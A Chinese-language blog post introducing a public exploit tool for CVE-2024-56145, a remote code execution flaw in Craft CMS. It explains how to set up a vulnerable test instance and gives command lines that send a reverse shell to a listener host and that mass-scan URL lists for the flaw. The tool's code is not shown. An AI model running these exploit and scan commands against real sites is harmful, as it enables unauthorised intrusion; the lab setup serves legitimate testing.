CVE-2024-56145:Craft CMS 漏洞利用工具

CVE-2024-56145:Craft CMS 漏洞利用工具

独眼情报 2024-12-22 02:51

这款工具专门用于利用由 Assetnote 研究团队发现的 Craft CMS 漏洞。该漏洞源于系统对用户提供的模板路径处理不当,攻击者可通过精心构造的载荷实现远程代码执行(RCE)🛠️。

🙏 特别感谢 Assetnote 团队在安全领域的贡献与研究。

✨ 功能特点

  • 🚀 自动化 FTP 服务器用于投放恶意载荷

  • 🧪 反向 Shell 载荷生成器,支持多种方式(bash、nc、mkfifo)

  • 🔍 漏洞检测器用于识别易受攻击的目标

  • 🖥️ 多线程支持实现更快扫描

  • 🛠️ 简单易用的命令行界面,反馈清晰明了

🛡️ 搭建测试环境

按以下步骤搭建 Craft CMS 测试实例:

mkdir exploit-craft && \
cd exploit-craft && \
# 配置用于 Craft CMS 的 DDEV 项目
ddev config \
  --project-type=craftcms \
  --docroot=web \
  --create-docroot \
  --php-version="8.2" \
  --database="mysql:8.0" \
  --nodejs-version="20" && \
# 创建 DDEV 项目
ddev start -y && \
# 使用指定版本创建 Craft CMS
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
# 安装特定版本的 CMS
ddev composer require "craftcms/cms:5.5.0" \
  --no-scripts \
  --no-interaction --with-all-dependencies && \
# 设置 Craft CMS 安全密钥
ddev craft setup/security-key && \
# 安装 Craft CMS
ddev craft install/craft \
    --username=admin \
    --password=password123 \
    [email protected] \
    --site-name=Testsite \
    --language=en \
    --site-url='$DDEV_PRIMARY_URL' && \
# 为 PHP 启用 register_argc_argv
mkdir -p .ddev/php/ && \
echo "register_argc_argv = On" > .ddev/php/php.ini && \
ddev restart && \
# 最后一步,输出提示信息并启动项目
echo '准备就绪!' && \
ddev launch

🚨 使用方法

使用 –help 参数查看可用命令:

python exploit.py --help

🚀 漏洞利用命令

攻击目标:

python exploit.py exploit -u <目标URL> -lh <本地主机> -lp <本地端口> -px <载荷类型>

⚙️ 参数说明:

  • -u / –url:目标网址(必填)

  • -lh / –lhost:用于接收反向 Shell 的本地 IP(必填)

  • -lp / –lport:监听器端口(必填)

  • -fh / –ftp-host:FTP 服务器主机

  • -fp / –ftp-port:FTP 服务器端口

  • -px / –payload:载荷类型(bash、nc、mkfifo),默认:bash

🧪 示例:

python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash

🔍 检查命令

检查目标是否存在漏洞:

python exploit.py check -u <目标URL> -f <URL列表文件> -t <线程数> -o <输出文件>

⚙️ 参数说明:

  • -u / –url:单个目标 URL

  • -f / –file:包含多个待扫描 URL 的文件

  • -t / –threads:扫描并发线程数

  • -o / –output:保存结果的输出文件

🧪 示例:

python exploit.py check -f urls.txt -t 10 -o results.txt

请谨慎使用,遵守道德规范!✨

https://github.com/Chocapikk/CVE-2024-56145